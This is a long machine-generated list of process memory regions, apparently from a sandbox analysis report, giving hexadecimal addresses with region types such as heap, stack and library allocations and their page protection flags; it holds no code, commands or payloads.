page read and write
775E000
stack
page read and write
2D24000
heap
page read and write
7BFE000
trusted library allocation
page read and write
B15000
trusted library allocation
page execute and read and write
73EB000
stack
page read and write
9E0000
heap
page read and write
7490000
trusted library section
page read and write
73E000
stack
page read and write
5D0000
trusted library allocation
page read and write
4CEE000
trusted library allocation
page read and write
2D83000
heap
page read and write
86A0000
heap
page read and write
724D000
stack
page read and write
88E0000
heap
page read and write
83C3000
trusted library allocation
page read and write
7BD8000
heap
page read and write
720D000
stack
page read and write
336B000
heap
page read and write
7020000
trusted library allocation
page read and write
2780000
heap
page read and write
4D15000
trusted library allocation
page read and write
73B0000
trusted library allocation
page read and write
6C0000
heap
page read and write
7EF00000
trusted library allocation
page execute and read and write
61F6000
trusted library allocation
page read and write
550B000
trusted library allocation
page read and write
68BF0000
unkown
page readonly
292D000
stack
page read and write
87F0000
heap
page read and write
6ECF000
stack
page read and write
466B000
trusted library allocation
page read and write
7C3D000
heap
page read and write
ED3000
trusted library allocation
page execute and read and write
3310000
trusted library allocation
page read and write
825F000
stack
page read and write
28C0000
heap
page read and write
542000
unkown
page execute and read and write
4F8000
stack
page read and write
517E000
trusted library allocation
page read and write
7BF7000
heap
page read and write
4B1E000
stack
page read and write
8AF7000
heap
page read and write
4CE6000
trusted library allocation
page read and write
45F0000
heap
page readonly
926000
heap
page read and write
2C18000
heap
page read and write
869000
heap
page read and write
2A34000
trusted library allocation
page read and write
7823000
heap
page read and write
736D000
stack
page read and write
6F50000
trusted library allocation
page execute and read and write
6CAE000
stack
page read and write
8CAE000
stack
page read and write
327E000
stack
page read and write
83B0000
trusted library allocation
page read and write
840000
trusted library allocation
page execute and read and write
E60000
trusted library allocation
page execute and read and write
5EA8000
trusted library allocation
page read and write
7E60000
trusted library allocation
page read and write
7D7000
heap
page read and write
740000
trusted library allocation
page read and write
6B0E000
stack
page read and write
D2C000
stack
page read and write
3300000
heap
page read and write
3609000
trusted library allocation
page read and write
149000
stack
page read and write
323C000
stack
page read and write
4CE2000
trusted library allocation
page read and write
506E000
stack
page read and write
8BCF000
stack
page read and write
5EA0000
trusted library allocation
page read and write
7A76000
heap
page read and write
514C000
heap
page read and write
7AC1000
heap
page read and write
7881000
heap
page read and write
2D81000
heap
page read and write
531F000
stack
page read and write
4CF0000
trusted library allocation
page read and write
7B7D000
stack
page read and write
35DE000
heap
page read and write
520D000
trusted library allocation
page read and write
80DE000
stack
page read and write
1D0000
heap
page read and write
298D000
heap
page read and write
7CB0000
trusted library allocation
page read and write
63E8000
trusted library allocation
page read and write
4EA0000
heap
page read and write
7A0E000
stack
page read and write
299D000
heap
page read and write
78B1000
heap
page read and write
5352000
trusted library allocation
page read and write
A6E000
stack
page read and write
5103000
heap
page read and write
789E000
heap
page read and write
2D6C000
heap
page read and write
3680000
trusted library allocation
page read and write
501E000
stack
page read and write
7058000
heap
page read and write
BC0000
trusted library allocation
page read and write
5B80000
direct allocation
page read and write
5964000
trusted library allocation
page read and write
3550000
trusted library allocation
page read and write
78A8000
heap
page read and write
8E94000
trusted library allocation
page read and write
5EBC000
trusted library allocation
page read and write
710000
heap
page read and write
3440000
trusted library allocation
page read and write
348A000
heap
page read and write
5070000
trusted library allocation
page read and write
89CF000
stack
page read and write
4D14000
trusted library allocation
page read and write
4FBC000
stack
page read and write
90FE000
stack
page read and write
9A8000
heap
page read and write
8BC0000
heap
page read and write
2740000
trusted library allocation
page read and write
3620000
trusted library allocation
page read and write
B12000
trusted library allocation
page read and write
5B3F000
stack
page read and write
831E000
stack
page read and write
299E000
heap
page read and write
8A50000
trusted library allocation
page read and write
8740000
trusted library allocation
page execute and read and write
5365000
trusted library allocation
page read and write
E70000
heap
page readonly
4CE1000
trusted library allocation
page read and write
5338000
trusted library allocation
page read and write
7E70000
trusted library allocation
page read and write
74BE000
stack
page read and write
32E0000
heap
page read and write
522C000
stack
page read and write
4D02000
trusted library allocation
page read and write
4B7E000
trusted library allocation
page read and write
352E000
stack
page read and write
DE3000
heap
page read and write
6E00000
direct allocation
page read and write
4F9E000
stack
page read and write
2D74000
heap
page read and write
7A59000
heap
page read and write
7826000
heap
page read and write
7BD0000
trusted library allocation
page read and write
4FF0000
trusted library allocation
page read and write
70F4000
heap
page read and write
8ABC000
heap
page read and write
7A61000
heap
page read and write
B73000
trusted library allocation
page execute and read and write
8DEF000
stack
page read and write
7860000
heap
page read and write
837F000
trusted library allocation
page read and write
443D000
stack
page read and write
860000
heap
page read and write
7420000
trusted library allocation
page read and write
4C8E000
stack
page read and write
7BA0000
trusted library allocation
page read and write
2CA0000
heap
page read and write
4D02000
trusted library allocation
page read and write
4D77000
trusted library allocation
page read and write
4D02000
trusted library allocation
page read and write
53C8000
trusted library allocation
page read and write
8950000
trusted library allocation
page execute and read and write
4901000
trusted library allocation
page read and write
6DE0000
trusted library allocation
page read and write
7C80000
trusted library allocation
page read and write
2D70000
heap
page read and write
7B80000
trusted library allocation
page read and write
4D15000
trusted library allocation
page read and write
7E60000
trusted library allocation
page execute and read and write
548A000
trusted library allocation
page read and write
73E0000
trusted library allocation
page read and write
299E000
heap
page read and write
86C0000
trusted library allocation
page execute and read and write
7C40000
trusted library allocation
page read and write
3360000
trusted library allocation
page read and write
431E000
stack
page read and write
71B0000
trusted library allocation
page read and write
9AC000
heap
page read and write
7E80000
trusted library allocation
page read and write
2787000
heap
page read and write
2984000
trusted library allocation
page read and write
299D000
heap
page read and write
73D0000
trusted library allocation
page read and write
899F000
stack
page read and write
5280000
trusted library allocation
page read and write
719E000
stack
page read and write
6A00000
heap
page read and write
33F0000
heap
page read and write
4D14000
trusted library allocation
page read and write
56E6000
trusted library allocation
page read and write
33CE000
stack
page read and write
D5E000
stack
page read and write
76BA000
stack
page read and write
8A30000
trusted library allocation
page read and write
2D7C000
heap
page read and write
4E50000
trusted library allocation
page read and write
1D0000
heap
page read and write
7AF0000
trusted library allocation
page read and write
356F000
heap
page read and write
819E000
stack
page read and write
7F528000
trusted library allocation
page execute and read and write
4796000
trusted library allocation
page read and write
6389000
trusted library allocation
page read and write
5BD0000
heap
page read and write
55A0000
heap
page read and write
524E000
stack
page read and write
7050000
heap
page execute and read and write
339D000
heap
page read and write
510C000
heap
page read and write
402000
unkown
page readonly
68BD000
stack
page read and write
AAD000
trusted library allocation
page execute and read and write
50E5000
heap
page execute and read and write
56AB000
trusted library allocation
page read and write
4D0A000
trusted library allocation
page read and write
8E9F000
trusted library allocation
page read and write
4D23000
trusted library allocation
page read and write
8190000
trusted library allocation
page read and write
6BD5000
heap
page read and write
4D06000
trusted library allocation
page read and write
54F6000
trusted library allocation
page read and write
7AE7000
heap
page read and write
8AC0000
heap
page read and write
7F2E000
stack
page read and write
5BE000
stack
page read and write
C5E000
heap
page read and write
323E000
stack
page read and write
44B0000
heap
page read and write
72ED000
stack
page read and write
7C7D000
stack
page read and write
4D77000
trusted library allocation
page read and write
4F28000
trusted library allocation
page read and write
4CC7000
heap
page read and write
77DE000
stack
page read and write
36B0000
heap
page read and write
7C0000
heap
page read and write
741B000
stack
page read and write
48E1000
trusted library allocation
page read and write
8C4E000
stack
page read and write
7F60000
trusted library allocation
page read and write
5E8000
heap
page read and write
3547000
heap
page read and write
7F0000
trusted library allocation
page read and write
7370000
trusted library allocation
page read and write
D9A000
heap
page read and write
7B02000
heap
page read and write
DFF000
heap
page read and write
4D15000
trusted library allocation
page read and write
4D05000
trusted library allocation
page read and write
74C0000
heap
page read and write
76DE000
stack
page read and write
735E000
stack
page read and write
850000
heap
page execute and read and write
3350000
heap
page read and write
45B7000
trusted library allocation
page execute and read and write
5530000
trusted library allocation
page read and write
5E8A000
trusted library allocation
page read and write
872F000
stack
page read and write
5451000
trusted library allocation
page read and write
732E000
stack
page read and write
8940000
heap
page read and write
5F0000
heap
page read and write
4D15000
trusted library allocation
page read and write
7E7D000
stack
page read and write
4CAE000
stack
page read and write
8D8E000
stack
page read and write
63A9000
trusted library allocation
page read and write
9E5000
heap
page read and write
3690000
trusted library allocation
page read and write
7EB0000
trusted library allocation
page read and write
5472000
trusted library allocation
page read and write
7FD000
trusted library allocation
page execute and read and write
1C0000
heap
page read and write
3360000
heap
page read and write
6F90000
trusted library allocation
page read and write
61F5000
trusted library allocation
page read and write
2926000
heap
page read and write
CBA000
heap
page read and write
4D0A000
trusted library allocation
page read and write
6BFD000
stack
page read and write
5519000
trusted library allocation
page read and write
4D03000
trusted library allocation
page read and write
7E70000
trusted library allocation
page read and write
8EBE000
stack
page read and write
3971000
trusted library allocation
page read and write
2FFF000
unkown
page read and write
8EF0000
trusted library allocation
page execute and read and write
B4F000
stack
page read and write
4CFA000
trusted library allocation
page read and write
4E30000
trusted library allocation
page read and write
70FE000
heap
page read and write
80D0000
direct allocation
page read and write
7360000
trusted library allocation
page read and write
4FB0000
trusted library allocation
page execute and read and write
704D000
stack
page read and write
3480000
heap
page read and write
2A10000
heap
page execute and read and write
47D000
stack
page read and write
4CA0000
trusted library allocation
page read and write
7A0000
heap
page read and write
8C6E000
stack
page read and write
35BC000
heap
page read and write
7ADF000
stack
page read and write
88CB000
trusted library allocation
page read and write
4CF4000
trusted library allocation
page read and write
7DD0000
trusted library allocation
page read and write
4CE9000
trusted library allocation
page read and write
E75000
heap
page execute and read and write
8E2E000
stack
page read and write
45E0000
trusted library allocation
page read and write
5A0000
heap
page read and write
89E000
stack
page read and write
8E9A000
trusted library allocation
page read and write
492000
unkown
page readonly
7ED0000
trusted library allocation
page execute and read and write
4D03000
trusted library allocation
page read and write
6DDE000
stack
page read and write
2B70000
heap
page read and write
8E0000
heap
page read and write
2960000
trusted library allocation
page read and write
6F9B0000
unkown
page readonly
E50000
heap
page read and write
7C29000
heap
page read and write
4CE1000
trusted library allocation
page read and write
77E0000
trusted library allocation
page read and write
AF9000
trusted library allocation
page read and write
4D57000
trusted library allocation
page read and write
7774000
heap
page read and write
4EC4000
trusted library allocation
page read and write
5721000
trusted library allocation
page read and write
26EE000
stack
page read and write
883E000
stack
page read and write
36A8000
trusted library allocation
page read and write
2730000
trusted library allocation
page execute and read and write
8A0000
heap
page readonly
7CCE000
stack
page read and write
6CBB000
stack
page read and write
513B000
heap
page read and write
6D7E000
stack
page read and write
4D44000
trusted library allocation
page read and write
4D2C000
trusted library allocation
page read and write
6C2C000
heap
page read and write
7E2D000
stack
page read and write
437F000
stack
page read and write
7C44000
heap
page read and write
4D11000
trusted library allocation
page read and write
8E70000
trusted library allocation
page read and write
4ABC000
trusted library allocation
page read and write
4D22000
trusted library allocation
page read and write
8F9000
heap
page read and write
7C60000
trusted library allocation
page read and write
4EF0000
unkown
page readonly
8B0000
trusted library allocation
page execute and read and write
43FF000
stack
page read and write
793E000
stack
page read and write
299D000
heap
page read and write
78CA000
heap
page read and write
5010000
trusted library allocation
page read and write
4CFA000
trusted library allocation
page read and write
450000
heap
page read and write
6D6E000
stack
page read and write
74D0000
heap
page read and write
7AAF000
heap
page read and write
6FE0000
trusted library allocation
page read and write
739E000
stack
page read and write
8CEE000
stack
page read and write
688B000
stack
page read and write
6CE1000
heap
page read and write
725E000
stack
page read and write
5679000
heap
page read and write
706A000
heap
page read and write
32E8000
heap
page read and write
4CE8000
trusted library allocation
page read and write
298B000
heap
page read and write
55DF000
stack
page read and write
63D4000
trusted library allocation
page read and write
68BF1000
unkown
page execute read
2C13000
heap
page read and write
766E000
stack
page read and write
E54000
heap
page read and write
B67000
heap
page read and write
5719000
trusted library allocation
page read and write
B3C000
heap
page read and write
4D82000
trusted library allocation
page read and write
3553000
trusted library allocation
page execute and read and write
4D00000
trusted library allocation
page read and write
8B0E000
stack
page read and write
691D000
stack
page read and write
966000
heap
page read and write
3560000
trusted library allocation
page read and write
5143000
heap
page read and write
511E000
heap
page read and write
53CE000
stack
page read and write
2F9000
stack
page read and write
8365000
trusted library allocation
page read and write
4D14000
trusted library allocation
page read and write
8E0000
heap
page read and write
55B4000
trusted library allocation
page read and write
7AAE000
stack
page read and write
6D2B000
stack
page read and write
5090000
direct allocation
page read and write
6DBA000
direct allocation
page read and write
2C11000
heap
page read and write
B10000
heap
page read and write
4D36000
trusted library allocation
page read and write
19C000
stack
page read and write
66CD000
stack
page read and write
8A40000
trusted library allocation
page read and write
3464000
trusted library allocation
page read and write
4600000
heap
page execute and read and write
36D0000
heap
page readonly
452C000
stack
page read and write
6011000
trusted library allocation
page read and write
7C09000
heap
page read and write
6EBE000
stack
page read and write
4CFE000
trusted library allocation
page read and write
815D000
stack
page read and write
74B0000
trusted library allocation
page read and write
3476000
heap
page read and write
366D000
trusted library allocation
page execute and read and write
73C0000
trusted library allocation
page read and write
6BAD000
stack
page read and write
766D000
stack
page read and write
539D000
stack
page read and write
7D20000
trusted library allocation
page execute and read and write
78E6000
heap
page read and write
81F000
stack
page read and write
6EEF000
heap
page read and write
7DAD000
stack
page read and write
4E80000
trusted library allocation
page execute and read and write
7D40000
heap
page execute and read and write
7C00000
trusted library allocation
page read and write
7970000
trusted library allocation
page read and write
F30000
heap
page read and write
C50000
heap
page read and write
292E000
stack
page read and write
71D0000
trusted library allocation
page read and write
2979000
heap
page read and write
7AB5000
heap
page read and write
6F9BC000
unkown
page readonly
968E000
stack
page read and write
7190000
trusted library allocation
page read and write
E5C000
stack
page read and write
4D11000
trusted library allocation
page read and write
4B40000
trusted library allocation
page read and write
4C0E000
stack
page read and write
A80000
trusted library allocation
page read and write
6CDE000
stack
page read and write
8AED000
heap
page read and write
7A6E000
stack
page read and write
731A000
stack
page read and write
7CD0000
trusted library allocation
page read and write
6A4E000
stack
page read and write
8DCE000
stack
page read and write
36E0000
trusted library allocation
page execute and read and write
A05000
heap
page read and write
53DE000
stack
page read and write
3365000
trusted library allocation
page execute and read and write
137F000
stack
page read and write
EC0000
trusted library allocation
page read and write
77F0000
heap
page read and write
35F0000
trusted library allocation
page read and write
E2D000
unkown
page read and write
4FDE000
stack
page read and write
56B0000
heap
page read and write
25EE000
stack
page read and write
6E0B000
direct allocation
page read and write
4D38000
trusted library allocation
page read and write
4CEE000
trusted library allocation
page read and write
36A0000
trusted library allocation
page read and write
8132000
heap
page read and write
874E000
stack
page read and write
2978000
heap
page read and write
7EDE000
stack
page read and write
9A9000
heap
page read and write
B44000
heap
page read and write
7160000
trusted library allocation
page read and write
7B70000
trusted library allocation
page read and write
4D8E000
trusted library allocation
page read and write
7C90000
trusted library allocation
page read and write
8510000
trusted library allocation
page execute and read and write
52F0000
heap
page execute and read and write
7BB0000
trusted library allocation
page read and write
8054000
heap
page read and write
90F000
stack
page read and write
2F27000
stack
page read and write
4EC2000
trusted library allocation
page read and write
85DE000
stack
page read and write
5050000
heap
page read and write
B8E000
stack
page read and write
3508000
heap
page read and write
25E4000
remote allocation
page readonly
35DE000
stack
page read and write
5177000
trusted library allocation
page read and write
4DF9000
stack
page read and write
54FE000
trusted library allocation
page read and write
78E1000
heap
page read and write
91E000
stack
page read and write
6FF0000
heap
page read and write
50E0000
heap
page execute and read and write
2965000
heap
page read and write
7D10000
heap
page read and write
35E0000
trusted library allocation
page read and write
5189000
trusted library allocation
page read and write
70BE000
heap
page read and write
5270000
trusted library allocation
page execute and read and write
7902000
heap
page read and write
541F000
stack
page read and write
352B000
heap
page read and write
6C28000
heap
page read and write
AED000
trusted library allocation
page execute and read and write
4DEE000
stack
page read and write
7C89000
trusted library allocation
page read and write
43D0000
heap
page read and write
3490000
trusted library allocation
page read and write
32BE000
stack
page read and write
6D80000
direct allocation
page read and write
512F000
stack
page read and write
4D0D000
trusted library allocation
page read and write
9B8000
heap
page read and write
CD9000
stack
page read and write
9A4000
heap
page read and write
53DE000
stack
page read and write
5661000
heap
page read and write
4CA6000
trusted library allocation
page read and write
5050000
direct allocation
page read and write
6F60000
trusted library allocation
page read and write
6D31000
trusted library allocation
page read and write
77F000
stack
page read and write
4CF0000
trusted library allocation
page read and write
65F000
stack
page read and write
4E60000
heap
page readonly
6039000
trusted library allocation
page read and write
528E000
stack
page read and write
15D000
stack
page read and write
8AA0000
heap
page read and write
55E1000
trusted library allocation
page read and write
777D000
stack
page read and write
45B0000
trusted library allocation
page read and write
89BE000
trusted library allocation
page read and write
5694000
heap
page read and write
7386000
direct allocation
page read and write
88BE000
stack
page read and write
779F000
stack
page read and write
C77000
heap
page read and write
BD0000
heap
page read and write
54A0000
heap
page read and write
DAD000
stack
page read and write
4F97000
trusted library allocation
page read and write
78CD000
heap
page read and write
75B000
stack
page read and write
7D90000
trusted library allocation
page read and write
5071000
trusted library allocation
page read and write
3503000
heap
page read and write
749E000
stack
page read and write
4D65000
trusted library allocation
page read and write
7D70000
trusted library allocation
page read and write
36C0000
heap
page read and write
757D000
stack
page read and write
4BAD000
stack
page read and write
6A4D000
stack
page read and write
4CEB000
trusted library allocation
page read and write
C9C000
stack
page read and write
878F000
stack
page read and write
748F000
stack
page read and write
AA4000
trusted library allocation
page read and write
5211000
trusted library allocation
page read and write
5E0000
heap
page read and write
958E000
stack
page read and write
5EA4000
trusted library allocation
page read and write
299E000
heap
page read and write
5906000
trusted library allocation
page read and write
34AA000
heap
page read and write
BA0000
trusted library allocation
page read and write
50CE000
stack
page read and write
BAB000
heap
page read and write
E15000
heap
page execute and read and write
76AA000
stack
page read and write
5C0000
heap
page read and write
E70000
trusted library allocation
page read and write
684E000
stack
page read and write
BA5000
trusted library allocation
page execute and read and write
70CA000
heap
page read and write
2D7D000
heap
page read and write
69E000
stack
page read and write
8E88000
trusted library allocation
page read and write
4962000
trusted library allocation
page read and write
6E7E000
stack
page read and write
7260000
heap
page execute and read and write
7AC5000
heap
page read and write
2998000
heap
page read and write
87B0000
trusted library allocation
page execute and read and write
355D000
stack
page read and write
7F770000
trusted library allocation
page execute and read and write
77AC000
heap
page read and write
4C77000
trusted library allocation
page read and write
805F000
direct allocation
page read and write
855D000
stack
page read and write
89C0000
heap
page read and write
805F000
direct allocation
page read and write
952D000
stack
page read and write
7A00000
trusted library allocation
page read and write
299D000
heap
page read and write
6DBA000
direct allocation
page read and write
274E000
stack
page read and write
368E000
stack
page read and write
74DD000
stack
page read and write
7E80000
trusted library allocation
page read and write
526D000
stack
page read and write
7036000
heap
page read and write
7EBF000
stack
page read and write
742E000
stack
page read and write
2E30000
heap
page read and write
370000
heap
page read and write
3692000
trusted library allocation
page read and write
354B000
heap
page read and write
8050000
direct allocation
page read and write
459E000
stack
page read and write
566B000
heap
page read and write
7380000
trusted library allocation
page read and write
4611000
trusted library allocation
page read and write
4D2A000
trusted library allocation
page read and write
89F7000
trusted library allocation
page read and write
C7E000
stack
page read and write
4CF9000
trusted library allocation
page read and write
AB0000
trusted library allocation
page read and write
4810000
heap
page read and write
70F1000
heap
page read and write
5357000
trusted library allocation
page read and write
512C000
heap
page read and write
525C000
trusted library allocation
page read and write
4919000
trusted library allocation
page read and write
70AF000
heap
page read and write
298D000
heap
page read and write
4E2F000
stack
page read and write
6C70000
trusted library allocation
page read and write
4D22000
trusted library allocation
page read and write
4E50000
heap
page read and write
299E000
heap
page read and write
4F1E000
stack
page read and write
565E000
heap
page read and write
2C06000
heap
page read and write
73E0000
trusted library allocation
page read and write
7AF0000
trusted library allocation
page read and write
5684000
heap
page read and write
5232000
trusted library allocation
page read and write
A2E000
stack
page read and write
7856000
heap
page read and write
5180000
heap
page execute and read and write
7DFB000
trusted library allocation
page read and write
8B5F000
heap
page read and write
351D000
heap
page read and write
297C000
heap
page read and write
6199000
trusted library allocation
page read and write
7840000
trusted library allocation
page read and write
35FD000
trusted library allocation
page execute and read and write
6E1B000
stack
page read and write
B37000
heap
page read and write
593E000
stack
page read and write
4CE9000
trusted library allocation
page read and write
70DE000
stack
page read and write
36D0000
trusted library allocation
page read and write
5A0F000
trusted library allocation
page read and write
50E8000
heap
page read and write
298D000
heap
page read and write
7960000
heap
page execute and read and write
7082000
heap
page read and write
6FE0000
heap
page read and write
2981000
heap
page read and write
6207000
trusted library allocation
page read and write
4E37000
trusted library allocation
page execute and read and write
2960000
heap
page read and write
7F40000
trusted library allocation
page execute and read and write
44E0000
heap
page read and write
7E50000
trusted library allocation
page read and write
3448000
heap
page read and write
A90000
heap
page read and write
5500000
heap
page execute and read and write
715D000
stack
page read and write
4CEE000
trusted library allocation
page read and write
5E0000
heap
page read and write
4641000
trusted library allocation
page read and write
8B4D000
stack
page read and write
71F0000
trusted library allocation
page read and write
8E6E000
stack
page read and write
D0D000
heap
page read and write
7804000
heap
page read and write
7A4E000
stack
page read and write
80AB000
heap
page read and write
4D4D000
trusted library allocation
page read and write
7D10000
trusted library allocation
page read and write
89FA000
trusted library allocation
page read and write
9039000
stack
page read and write
7E00000
heap
page read and write
811D000
stack
page read and write
3324000
trusted library allocation
page read and write
98A000
stack
page read and write
50B0000
direct allocation
page read and write
81B0000
trusted library allocation
page read and write
4D94000
trusted library allocation
page read and write
34CD000
heap
page read and write
69CC000
stack
page read and write
B1E000
heap
page read and write
7DB0000
trusted library allocation
page read and write
988000
heap
page read and write
53A7000
trusted library allocation
page read and write
506E000
direct allocation
page read and write
78BB000
stack
page read and write
73BE000
stack
page read and write
4CC0000
heap
page read and write
4D84000
trusted library allocation
page read and write
711E000
stack
page read and write
4EF2000
unkown
page execute read
722D000
stack
page read and write
4E94000
trusted library allocation
page read and write
298B000
heap
page read and write
4D03000
trusted library allocation
page read and write
3318000
heap
page read and write
8E8F000
trusted library allocation
page read and write
88D0000
trusted library allocation
page execute and read and write
4CAE000
trusted library allocation
page read and write
27CE000
stack
page read and write
346D000
trusted library allocation
page execute and read and write
E70000
heap
page execute and read and write
5010000
trusted library allocation
page read and write
4F20000
trusted library allocation
page read and write
8800000
trusted library allocation
page read and write
6C56000
heap
page read and write
6FA0000
trusted library allocation
page read and write
5561000
trusted library allocation
page read and write
8B7E000
stack
page read and write
327E000
stack
page read and write
8FD2000
trusted library allocation
page read and write
7AE2000
trusted library allocation
page read and write
5135000
heap
page read and write
34F0000
trusted library allocation
page read and write
2770000
trusted library allocation
page read and write
950000
heap
page read and write
BF0000
trusted library allocation
page read and write
99CE000
stack
page read and write
521D000
trusted library allocation
page read and write
33F0000
heap
page read and write
79CF000
stack
page read and write
3380000
trusted library allocation
page read and write
48D0000
heap
page read and write
988F000
stack
page read and write
4CF0000
trusted library allocation
page read and write
77A1000
heap
page read and write
707F000
heap
page read and write
4D16000
trusted library allocation
page read and write
347D000
trusted library allocation
page execute and read and write
B7C000
heap
page read and write
8040000
heap
page read and write
45A0000
trusted library allocation
page read and write
7710000
heap
page read and write
890D000
trusted library allocation
page read and write
820000
trusted library allocation
page read and write
49EC000
stack
page read and write
36F7000
heap
page read and write
4EE0000
trusted library allocation
page read and write
6EBE000
stack
page read and write
3304000
trusted library allocation
page read and write
4D15000
trusted library allocation
page read and write
6D2E000
stack
page read and write
9F6000
heap
page read and write
3278000
stack
page read and write
8BBF000
stack
page read and write
2960000
heap
page execute and read and write
ABF000
stack
page read and write
5B0000
heap
page read and write
AE0000
trusted library allocation
page read and write
5D0000
heap
page read and write
8ED3000
trusted library allocation
page read and write
4E04000
trusted library allocation
page read and write
6ACE000
stack
page read and write
72AE000
stack
page read and write
3429000
heap
page read and write
75B000
heap
page read and write
4B5E000
stack
page read and write
89F0000
trusted library allocation
page read and write
8B50000
heap
page read and write
7D20000
heap
page execute and read and write
7BB0000
trusted library allocation
page read and write
5103000
heap
page read and write
3345000
trusted library allocation
page execute and read and write
4920000
trusted library allocation
page read and write
3360000
heap
page read and write
69BE000
stack
page read and write
7170000
trusted library allocation
page read and write
75AE000
stack
page read and write
6F70000
trusted library allocation
page read and write
5011000
trusted library allocation
page read and write
2ADD000
stack
page read and write
68D000
heap
page read and write
503E000
stack
page read and write
5904000
trusted library allocation
page read and write
5020000
heap
page read and write
8378000
trusted library allocation
page read and write
4D60000
heap
page execute and read and write
4D1F000
trusted library allocation
page read and write
6CB0000
trusted library allocation
page read and write
327D000
stack
page read and write
1480000
heap
page read and write
772A000
stack
page read and write
7B70000
heap
page read and write
773B000
stack
page read and write
298C000
heap
page read and write
55EE000
stack
page read and write
7C20000
trusted library allocation
page read and write
2C02000
heap
page read and write
52AE000
stack
page read and write
2750000
heap
page read and write
95E000
stack
page read and write
7D00000
trusted library allocation
page read and write
8410000
trusted library allocation
page execute and read and write
4E1C000
trusted library allocation
page read and write
58E0000
trusted library allocation
page read and write
6A0E000
stack
page read and write
73A0000
direct allocation
page read and write
7970000
trusted library allocation
page read and write
716C000
heap
page read and write
F0B000
trusted library allocation
page execute and read and write
DEE000
heap
page read and write
4CA2000
trusted library allocation
page read and write
75AE000
stack
page read and write
50C2000
trusted library allocation
page read and write
6F9B2000
unkown
page execute read
7CB6000
heap
page read and write
299E000
heap
page read and write
298D000
heap
page read and write
7740000
heap
page read and write
7882000
heap
page read and write
71A0000
trusted library allocation
page read and write
540000
unkown
page execute and read and write
730D000
stack
page read and write
7A90000
trusted library allocation
page read and write
4F6D000
stack
page read and write
6CEE000
stack
page read and write
45AD000
trusted library allocation
page execute and read and write
6B3B000
stack
page read and write
32E5000
heap
page read and write
980000
heap
page read and write
7C70000
heap
page read and write
6FDD000
stack
page read and write
2C28000
heap
page read and write
744E000
stack
page read and write
7BC0000
trusted library allocation
page read and write
56A3000
heap
page read and write
2908000
heap
page read and write
4831000
trusted library allocation
page read and write
7390000
trusted library allocation
page read and write
809000
trusted library allocation
page read and write
83C0000
trusted library allocation
page read and write
7FA0000
trusted library allocation
page read and write
4D08000
trusted library allocation
page read and write
68C0B000
unkown
page readonly
3440000
heap
page read and write
4CF0000
trusted library allocation
page read and write
8B63000
heap
page read and write
8AB4000
heap
page read and write
85D0000
trusted library allocation
page execute and read and write
7DD3000
trusted library allocation
page read and write
3525000
heap
page read and write
56AA000
heap
page read and write
7A30000
trusted library allocation
page read and write
54CE000
stack
page read and write
79F0000
heap
page read and write
7E5F000
stack
page read and write
6F0E000
stack
page read and write
5674000
heap
page read and write
732E000
stack
page read and write
7D20000
trusted library allocation
page read and write
5061000
trusted library allocation
page read and write
357D000
unkown
page read and write
2D6A000
heap
page read and write
8B29000
heap
page read and write
8B8E000
stack
page read and write
5831000
trusted library allocation
page read and write
3600000
trusted library allocation
page read and write
4594000
trusted library allocation
page read and write
2890000
heap
page read and write
6DDA000
trusted library allocation
page read and write
6E20000
direct allocation
page read and write
706D000
stack
page read and write
8AB0000
heap
page read and write
7DE0000
trusted library allocation
page execute and read and write
3350000
heap
page read and write
7E90000
trusted library allocation
page read and write
4C10000
heap
page read and write
4820000
heap
page execute and read and write
4F00000
heap
page execute and read and write
4B5F000
stack
page read and write
4F70000
heap
page readonly
7A5D000
heap
page read and write
86B0000
trusted library allocation
page execute and read and write
6DAF000
direct allocation
page read and write
77D0000
heap
page execute and read and write
298D000
heap
page read and write
4D32000
trusted library allocation
page read and write
532D000
trusted library allocation
page read and write
6DC0000
direct allocation
page read and write
7FB0000
trusted library allocation
page read and write
8B1B000
heap
page read and write
7D0000
heap
page read and write
4D77000
trusted library allocation
page read and write
10C000
stack
page read and write
8EB0000
trusted library allocation
page read and write
7747000
heap
page read and write
50A1000
direct allocation
page read and write
7440000
trusted library allocation
page read and write
4DE5000
trusted library allocation
page read and write
2978000
heap
page read and write
7867000
heap
page read and write
7816000
heap
page read and write
6089000
trusted library allocation
page read and write
A4E000
stack
page read and write
4FA0000
heap
page readonly
8C0E000
stack
page read and write
F07000
trusted library allocation
page execute and read and write
6BBF000
heap
page read and write
3BE000
unkown
page read and write
4D15000
trusted library allocation
page read and write
7AF0000
trusted library allocation
page execute and read and write
3448000
trusted library allocation
page read and write
4D23000
trusted library allocation
page read and write
8260000
trusted library allocation
page read and write
98CE000
stack
page read and write
5715000
trusted library allocation
page read and write
2D5E000
heap
page read and write
51CD000
trusted library allocation
page read and write
7060000
trusted library allocation
page read and write
4F6E000
stack
page read and write
4CF8000
trusted library allocation
page read and write
2C14000
heap
page read and write
7EF20000
trusted library allocation
page execute and read and write
516E000
stack
page read and write
4CF8000
trusted library allocation
page read and write
7C00000
trusted library allocation
page read and write
4BE0000
trusted library allocation
page execute and read and write
3356000
heap
page read and write
3400000
heap
page read and write
763F000
stack
page read and write
4EA9000
trusted library allocation
page read and write
7D10000
trusted library allocation
page read and write
89F0000
trusted library allocation
page read and write
B7D000
trusted library allocation
page execute and read and write
7C46000
heap
page read and write
7DE0000
trusted library allocation
page read and write
2D73000
heap
page read and write
787E000
stack
page read and write
7A62000
trusted library allocation
page read and write
2C13000
heap
page read and write
74A0000
heap
page execute and read and write
693F000
stack
page read and write
5929000
trusted library allocation
page read and write
4D54000
trusted library allocation
page read and write
367E000
stack
page read and write
569D000
heap
page read and write
7894000
heap
page read and write
C7A000
heap
page read and write
7130000
heap
page read and write
4CF3000
trusted library allocation
page read and write
77BD000
stack
page read and write
3690000
heap
page readonly
6C70000
trusted library allocation
page read and write
4BA0000
trusted library allocation
page read and write
5759000
trusted library allocation
page read and write
BD2000
heap
page read and write
8250000
trusted library allocation
page read and write
510E000
heap
page read and write
3365000
heap
page read and write
4CE9000
trusted library allocation
page read and write
4BA2000
trusted library allocation
page read and write
7B80000
trusted library allocation
page read and write
71F0000
trusted library allocation
page read and write
4FD000
stack
page read and write
6EFE000
stack
page read and write
400000
heap
page read and write
8C8E000
stack
page read and write
4C17000
heap
page read and write
87F0000
heap
page read and write
8DCE000
stack
page read and write
7C3A000
heap
page read and write
2780000
heap
page read and write
7876000
heap
page read and write
272E000
stack
page read and write
2C1E000
heap
page read and write
7820000
heap
page read and write
4CE0000
trusted library allocation
page read and write
25F9000
remote allocation
page readonly
8A0E000
stack
page read and write
8D4F000
stack
page read and write
25E7000
remote allocation
page execute and read and write
771E000
stack
page read and write
3280000
heap
page read and write
4766000
trusted library allocation
page read and write
459D000
trusted library allocation
